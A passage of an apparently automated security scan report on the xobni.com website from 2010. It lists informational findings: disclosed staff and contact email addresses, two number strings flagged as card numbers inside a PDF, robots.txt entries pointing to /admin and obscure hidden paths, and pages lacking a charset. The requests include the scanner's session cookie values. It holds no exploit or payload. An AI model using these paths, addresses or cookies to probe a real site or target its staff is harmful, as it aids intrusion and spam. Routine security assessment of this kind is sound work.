Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 69404

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /icons</title>
</head>
<body>
<h1>Index of /icons</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"
...[SNIP]...
have been
included in the NCSA httpd and Apache server distributions in the
past. They are in the public domain and may be freely included in any
application. The originals were done by Kevin Hughes (kevinh@kevcom.com).
Andy Polyakov tuned the icon colors and added few new images.</p>
...[SNIP]...
<p>Almost all of these icons are 20x22 pixels in size. There are
alternative icons in the "small" directory that are 16x16 in size,
provided by Mike Brown (mike@hyperreal.org).</p>
...[SNIP]...

14.16. http://www.xobni.com/javascripts/jquery.base64.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/javascripts/jquery.base64.min.js

Issue detail

The following email address was disclosed in the response:

hpyer@yahoo.cn

Request

GET /javascripts/jquery.base64.min.js HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:02:58 GMT
Server: Apache
Last-Modified: Tue, 30 Nov 2010 19:57:17 GMT
ETag: "3b099c-12d0e-4964a987e4140"
Accept-Ranges: bytes
Content-Length: 77070
Connection: close
Content-Type: application/javascript

/*
@desc
   Base64 encoder and decoder write by JavaScript. This code was a plugin of
   jQeury, you must load jQuery library first if you want to use this code.
    - After encode, you can decode it w
...[SNIP]...
<hpyer@yahoo.cn>
...[SNIP]...

14.17. http://www.xobni.com/learnmore/mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/mobile

Issue detail

The following email address was disclosed in the response:

john.smith@xobni.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15898

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni f..r BlackB
...[SNIP]...
<div class="fineprint" style="margin-top: 12px;">e.g., john.smith@xobni.com</div>
...[SNIP]...

14.18. http://www.xobni.com/learnmore/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/mobile/

Issue detail

The following email address was disclosed in the response:

john.smith@xobni.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15798

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni for BlackBe
...[SNIP]...
<div class="fineprint" style="margin-top: 12px;">e.g., john.smith@xobni.com</div>
...[SNIP]...

14.19. http://www.xobni.com/learnmore/mobile/blackberry/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/mobile/blackberry/

Issue detail

The following email address was disclosed in the response:

john.smith@xobni.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15934

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni f..r BlackB
...[SNIP]...
<div class="fineprint" style="margin-top: 12px;">e.g., john.smith@xobni.com</div>
...[SNIP]...

14.20. http://www.xobni.com/legal/ip_policy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/legal/ip_policy

Issue detail

The following email address was disclosed in the response:

legal@xobni.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9181

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>IP Policy</TITLE>
...[SNIP]...
<p>By email: legal@xobni.com</p>
...[SNIP]...

14.21. http://www.xobni.com/legal/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/legal/privacy

Issue detail

The following email address was disclosed in the response:

privacy@xobni.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19920

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Politique de conf
...[SNIP]...
<p>En cas de question sur le pr..sente Politique de confidentialit.., sur les pratiques de ce site ou sur votre utilisation de celui-ci, veuillez nous contacter .. privacy@xobni.com ou nous ..crire .. l...adresse suivante : </p>
...[SNIP]...

14.22. http://www.xobni.com/legal/trademarks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/legal/trademarks

Issue detail

The following email address was disclosed in the response:

info@xobni.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12015

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Trademarks and Br
...[SNIP]...
<li>Questions and requests for permission may be submitted by emailing us at: info@xobni.com with complete samples of each proposed use. </li>
...[SNIP]...

14.23. http://www.xobni.com/mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/mobile

Issue detail

The following email address was disclosed in the response:

john.smith@xobni.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:05:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16307

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni pour BlackB
...[SNIP]...
<div class="fineprint" style="margin-top: 12px;">e.g., john.smith@xobni.com</div>
...[SNIP]...

14.24. http://www.xobni.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/mobile/

Issue detail

The following email address was disclosed in the response:

john.smith@xobni.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16310

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni pour BlackB
...[SNIP]...
<div class="fineprint" style="margin-top: 12px;">e.g., john.smith@xobni.com</div>
...[SNIP]...

14.25. http://www.xobni.com/opensource/NsisDotNet/README.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/opensource/NsisDotNet/README.htm

Issue detail

The following email addresses were disclosed in the response:

adam.smith@xobni.com
support@xobni.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:20:37 GMT
Server: Apache
Last-Modified: Thu, 29 Oct 2009 18:49:15 GMT
ETag: "3b41dd-c51-477175e3000c0"
Accept-Ranges: bytes
Content-Length: 3153
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>This plugin for the NSIS install</title>
</h
...[SNIP]...
<br>
!define SUPPORT_EMAIL "support@xobni.com"</font>
...[SNIP]...
<a href="mailto:adam.smith@xobni.com">
...[SNIP]...

14.26. http://www.xobni.com/press/05202010_german_release.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/press/05202010_german_release.php

Issue detail

The following email addresses were disclosed in the response:

Detlev.henning@axicom.com
sarah.porter@axicom.com
terra@xobni.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14896

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Press Cente
...[SNIP]...
</p>

US:                UK:                Germany:
Terra Carmichael            Sarah Porter            Detlev Henning
terra@xobni.com            sarah.porter@axicom.com    Detlev.henning@axicom.com
415.684.7681            0208 392 4066

<h2>
...[SNIP]...
<a href="mailto:terra@xobni.com">terra@xobni.com</a>
...[SNIP]...
<a href="mailto:sarah.porter@axicom.com">sarah.porter@axicom.com</a>
...[SNIP]...
<a href="mailto:Detlev.henning@axicom.com">Detlev.henning@axicom.com</a>
...[SNIP]...

14.27. http://www.xobni.com/press/09022010_harris_survey previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/press/09022010_harris_survey

Issue detail

The following email addresses were disclosed in the response:

Samantha@sutherlandgold.com
terra@xobni.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17914

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni Press Cente
...[SNIP]...
<a href="mailto:terra@xobni.com">terra@xobni.com</a>
...[SNIP]...
<a href="mailto:Samantha@sutherlandgold.com">Samantha@sutherlandgold.com</a>
...[SNIP]...

14.28. http://www.xobni.com/press/10282010_french_release.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/press/10282010_french_release.php

Issue detail

The following email address was disclosed in the response:

terra@xobni.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12289

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni Press Cente
...[SNIP]...
<a href="mailto:terra@xobni.com">terra@xobni.com</a>
...[SNIP]...

14.29. http://www.xobni.com/support/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/support/

Issue detail

The following email addresses were disclosed in the response:

John@contoso.com
billing@xobni.com
ken@contoso.com
mobilesupport@xobni.com
terra@contoso.com
theo@initech.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 200143

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni - Xobni Sup
...[SNIP]...
<a href='mailto:billing@xobni.com'>billing@xobni.com</a>
...[SNIP]...
<a href='mailto:mobilesupport@xobni.com'>mobilesupport@xobni.com</a>
...[SNIP]...
<a href='mailto:billing@xobni.com'>
...[SNIP]...
<i>Theo buys a Xobni Plus license to use on his desktop computer at the office. He uses his work account (theo@initech.com) to register his license. At home, Theo uses a laptop to check his personal Yahoo! mail account, so he buys a 2nd license of Xobni Plus (and uses his work email account to activate the 2nd seat licens
...[SNIP]...
<a href='mailto:mobilesupport@xobni.com'>mobilesupport@xobni.com</a>
...[SNIP]...
he Login column,Look in your Outlook Inbox for the email with the new password *NOTE: Look in your spam or junkmail folders, if you do not see it in the inbox. If you do not receive it, please email billing@xobni.com to have us email you one.If you are able to log into your Xobni account on www.xobni.com/account, and simply want to change your Xobni account password, please do the following:Go to www.xobni.com/acc
...[SNIP]...
egation of data gathered from your local email data. In this case, the word 'Network' simply refers to your personal 'network' of contacts. For example, let's say that you have received an email from John@contoso.com with terra@contoso.com and ken@contoso.com on the cc line. Now when you go to view Ken's Xobni profile, you will see John and Terra listed in his network, even though Ken has never sent you an email. You may find that you have unfamiliar peo
...[SNIP]...
<a href='mailto:mobilesupport@xobni.com'>mobilesupport@xobni.com</a>
...[SNIP]...
<a href='mailto:billing@xobni.com'>
...[SNIP]...
<a href='mailto:billing@xobni.com'>
...[SNIP]...

14.30. http://www.xobni.com/support/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/support/index.php

Issue detail

The following email addresses were disclosed in the response:

John@contoso.com
billing@xobni.com
ken@contoso.com
mobilesupport@xobni.com
terra@contoso.com
theo@initech.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 200170

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni - Xobni Sup
...[SNIP]...
<a href='mailto:billing@xobni.com'>billing@xobni.com</a>
...[SNIP]...
<a href='mailto:mobilesupport@xobni.com'>mobilesupport@xobni.com</a>
...[SNIP]...
<a href='mailto:billing@xobni.com'>
...[SNIP]...
<i>Theo buys a Xobni Plus license to use on his desktop computer at the office. He uses his work account (theo@initech.com) to register his license. At home, Theo uses a laptop to check his personal Yahoo! mail account, so he buys a 2nd license of Xobni Plus (and uses his work email account to activate the 2nd seat licens
...[SNIP]...
<a href='mailto:mobilesupport@xobni.com'>mobilesupport@xobni.com</a>
...[SNIP]...
he Login column,Look in your Outlook Inbox for the email with the new password *NOTE: Look in your spam or junkmail folders, if you do not see it in the inbox. If you do not receive it, please email billing@xobni.com to have us email you one.If you are able to log into your Xobni account on www.xobni.com/account, and simply want to change your Xobni account password, please do the following:Go to www.xobni.com/acc
...[SNIP]...
egation of data gathered from your local email data. In this case, the word 'Network' simply refers to your personal 'network' of contacts. For example, let's say that you have received an email from John@contoso.com with terra@contoso.com and ken@contoso.com on the cc line. Now when you go to view Ken's Xobni profile, you will see John and Terra listed in his network, even though Ken has never sent you an email. You may find that you have unfamiliar peo
...[SNIP]...
<a href='mailto:mobilesupport@xobni.com'>mobilesupport@xobni.com</a>
...[SNIP]...
<a href='mailto:billing@xobni.com'>
...[SNIP]...
<a href='mailto:billing@xobni.com'>
...[SNIP]...

14.31. https://www.xobni.com/support/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.xobni.com
Path:	/support/

Issue detail

The following email addresses were disclosed in the response:

John@contoso.com
billing@xobni.com
ken@contoso.com
mobilesupport@xobni.com
terra@contoso.com
theo@initech.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:12:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 200452

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni - Xobni Sup
...[SNIP]...
<a href='mailto:billing@xobni.com'>billing@xobni.com</a>
...[SNIP]...
<a href='mailto:mobilesupport@xobni.com'>mobilesupport@xobni.com</a>
...[SNIP]...
<a href='mailto:billing@xobni.com'>
...[SNIP]...
<i>Theo buys a Xobni Plus license to use on his desktop computer at the office. He uses his work account (theo@initech.com) to register his license. At home, Theo uses a laptop to check his personal Yahoo! mail account, so he buys a 2nd license of Xobni Plus (and uses his work email account to activate the 2nd seat licens
...[SNIP]...
<a href='mailto:mobilesupport@xobni.com'>mobilesupport@xobni.com</a>
...[SNIP]...
he Login column,Look in your Outlook Inbox for the email with the new password *NOTE: Look in your spam or junkmail folders, if you do not see it in the inbox. If you do not receive it, please email billing@xobni.com to have us email you one.If you are able to log into your Xobni account on www.xobni.com/account, and simply want to change your Xobni account password, please do the following:Go to www.xobni.com/acc
...[SNIP]...
egation of data gathered from your local email data. In this case, the word 'Network' simply refers to your personal 'network' of contacts. For example, let's say that you have received an email from John@contoso.com with terra@contoso.com and ken@contoso.com on the cc line. Now when you go to view Ken's Xobni profile, you will see John and Terra listed in his network, even though Ken has never sent you an email. You may find that you have unfamiliar peo
...[SNIP]...
<a href='mailto:mobilesupport@xobni.com'>mobilesupport@xobni.com</a>
...[SNIP]...
<a href='mailto:billing@xobni.com'>
...[SNIP]...
<a href='mailto:billing@xobni.com'>
...[SNIP]...

15. Credit card numbers disclosed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/datasheets/data_sheet-enterprise-031010.pdf

Issue detail

The following credit card numbers were disclosed in the response:

5185004800000000
5374637410463000

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /enterprise/datasheets/data_sheet-enterprise-031010.pdf HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:29 GMT
Server: Apache
Last-Modified: Wed, 02 Jun 2010 23:10:58 GMT
ETag: "3b04c0-89ec1-4881433e1c480"
Accept-Ranges: bytes
Content-Length: 564929
Connection: close
Content-Type: application/pdf

%PDF-1.3
%...........
4 0 obj
<< /Length 5 0 R /Filter /FlateDecode >>
stream
x.+T.T(T0.B3C#.sK#..T.p.<.}.\C..|.@.....
endstream
endobj
5 0 obj
40
endobj
2 0 obj
<< /Type /Page /Parent 3 0 R /Resource
...[SNIP]...
0 0 278 0 278 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 593 0 0 0 222 0 0 0 0 0 741 0 0 0 0 556 0 0 0 574 0 0 0 0 0 0 0 0
519 574 519 574 519 259 556 537 185 0 500 185 833 537 556 574 0 315 481 296
537 463 741 0 463 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 800 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 444

...[SNIP]...
800 648 685 722 704 611 574 759 722 259 519 0 556
871 722 760 648 0 685 648 574 722 0 926 611 0 0 0 0 0 0 0 0 537 593 537 593
537 296 574 556 222 0 519 222 853 556 574 593 593 333 500 315 556 500 758
518 500 480 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1000 426 426 0 278 0 0 0 0 0 0 0 0 518
]
e
...[SNIP]...

16. Robots.txt file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.xobni.com
Path:	/videos/

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.xobni.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:12:42 GMT
Server: Apache
Last-Modified: Thu, 29 Oct 2009 18:49:15 GMT
ETag: "3b03cf-bf-477175e3000c0"
Accept-Ranges: bytes
Content-Length: 191
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# Allow all other robots to browse everywhere
User-agent: *
Disallow: /admin
Disallow: /push
Disallow: /xlbh084ghjklyvco872656468
Disallow: /xlbh084ghjklyvco872656468/jhvbil75jhsd2546s7l

17. HTML does not specify charset previous next
There are 5 instances of this issue:

/media/plus/xobni_plus_07.php
/media/walkthroughs/xobni_features_02/
/media/widgets.html
/support/howto
/support/upload/

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

17.1. http://www.xobni.com/media/plus/xobni_plus_07.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/media/plus/xobni_plus_07.php

Request

GET /media/plus/xobni_plus_07.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/plus/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:20:19 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2240
Connection: close
Content-Type: text/html

<html>
   <head>
       <style type="text/css">
           body {
               margin: 0;
               background-color: black;
               color: white;
           }
           #noUpdate {
               padding: 10px;
               font: normal 13px Arial;
               color: #808080;
...[SNIP]...

17.2. http://www.xobni.com/media/walkthroughs/xobni_features_02/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/media/walkthroughs/xobni_features_02/

Request

GET /media/walkthroughs/xobni_features_02/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 3567
Connection: close
Content-Type: text/html

<html>
   <head>
       <style type="text/css">
           body {
               margin: 0;
               background-color: black;
               color: white;
           }
           #noUpdate {
               padding: 10px;
               font: normal 13px Arial;
               color: #808080;
...[SNIP]...

17.3. http://www.xobni.com/media/widgets.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/media/widgets.html

Request

GET /media/widgets.html HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:19:30 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 22:11:24 GMT
ETag: "3b089d-b5-486e59f3c3b00"
Accept-Ranges: bytes
Content-Length: 181
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<HTML>
<SCRIPT>
..var xobni = {};

..xobni.ContentFetcher = window.external.Create("ContentFetcher");
..document.write(xobni.ContentFetcher.GetPageContent());
</SCRIPT>
</HTML>

17.4. http://www.xobni.com/support/howto previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/support/howto

Request

GET /support/howto HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
